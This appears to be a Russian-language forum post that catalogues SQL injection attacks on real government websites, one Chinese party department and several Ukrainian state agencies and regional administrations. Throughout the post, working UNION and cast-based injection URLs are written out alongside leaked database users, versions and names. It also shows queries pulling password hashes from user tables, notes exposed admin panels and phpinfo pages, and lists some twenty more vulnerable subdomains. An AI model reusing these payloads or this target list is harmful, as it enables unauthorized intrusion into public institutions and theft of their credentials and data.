Коммунистическая партия Китая. Организация департамента Dashiqiao
http://www.dsqzzb.
gov.cn/kxfz/news.php?sid=-23+union+select+1,version()--+
У кого там зуб на Украину? :P.. у меня нет.. ) Там щас выборы в Украине..Потому..
Официйний сайт Державного департамента з усиновлення та захисту прав дитини Міністерства України у справах сім'ї, молоді та спорту
http://www.ditu.
gov.ua/en/decrees/-2177+union+select+1,2,3,4,5,concat_ws%280x3a,user% 28%29,version%28%29,database%28%29%29,7,8,9,10,11, 12,13,14,15,16+from+mysql.user--+
user() -
root@localhost
version() - 5.0.51b-community-nt-log
database() - depdeti
file_priv = Y
/phpmyadmin/ присутствует
/admin/ тоже
Чернігівська облдержадміністрація
http://cg.
gov.ua/single_page.php?menu_id=-5+union+select+1,usesuper||chr%2858%29||passwd+fro m+pg_user+LIMIT+1+OFFSET+0--+&NameTable=static_page&TypeCod=&DEPAT=27&pm=green _menu
http://cg.gov.ua/single_page.php?menu_id=-5+union+select+1,usesuper||chr%2858%29||passwd+fro m+pg_user+LIMIT+1+OFFSET+0--+&NameTable=static_page&TypeCod=&DEPAT=27&pm=green _menu
http://cg.gov.ua/single_page.php?menu_id=-5+union+select+1,user||chr%2858%29||passwd+from+co m.users+LIMIT+1+OFFSET+0--+&NameTable=static_page&TypeCod=&DEPAT=27&pm=green _menu
http://cg.gov.ua/static_list.php?menu_id=1&NameTable=static_list&Ty peCod=&DEPAT=29+and+1=cast%28%28SELECT+current_use r||chr%2858%29||current_database%28%29||chr%2858%2 9||version%28%29%29+as+int%29--&pm=blue_menu
http://sosadm.cg.
gov.ua/single_page.php?menu_id=-5+and+1=cast%28%28SELECT+current_user||chr%2858%29 ||current_database%28%29||chr%2858%29||version%28% 29%29+as+int%29--&NameTable=static_page&TypeCod=&DEPAT=27&pm=green_ menu
user - www
database - portal
version - PostgreSQL 8.3.5 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 4.2.4
Как я понял, все поддомены там под одним юзвером и двигом. Получается добавим список уязвимых (под)сайтов.
bobradm.cg.
gov.ua
borzadm.cg.
gov.ua
chernrda.cg.
gov.ua
goradm.cg.
gov.ua
ichadm.cg.
gov.ua
koradm.cg.
gov.ua
kpadm.cg.
gov.ua
kuladm.cg.
gov.ua
meadm.cg.
gov.ua
neadm.cg.
gov.ua
nosadm.cg.
gov.ua
novgadm.cg.
gov.ua
oda.cg.
gov.ua
pladm.cg.
gov.ua
rpadm.cg.
gov.ua
schorsadm.cg.
gov.ua
semadm.cg.
gov.ua
sribadm.cg.
gov.ua
taladm.cg.
gov.ua
varadm.cg.
gov.ua
не кисло
Система розкриття інформації на фондовому ринку України. Агентство по развитию инфраструктуры фондового рынка Украины
http://www.smida.
gov.ua/emitents/zvit_menu.php?id=4746+and+substring(version(),1,1) =4&forma=PERSON_Z&zvit_type=zat414&kod=32979387
http://old.smida.gov.ua/news/sv_1.php?id_news=-8077+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,use r(),version(),database()),9,10,11,12,13,14
Disallow: /adminzone/
phpinfo.php на месте
user() - dbu@localhost
version() - 4.1.20-log
database() - smida
ВИЩА КВАЛІФІКАЦІЙНА КОМІСІЯ АДВОКАТУРИ при Кабінеті Міністрів України
http://www.vkka.
gov.ua/index.php?page=katalog&id=-41+union+select+1,concat_ws%280x3a,version%28%29,u ser%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17--+
version() - 5.1.30-log
user() - vkka_root@localhost
database() - vkka_adv
все выводиться на ура
админка присутствует.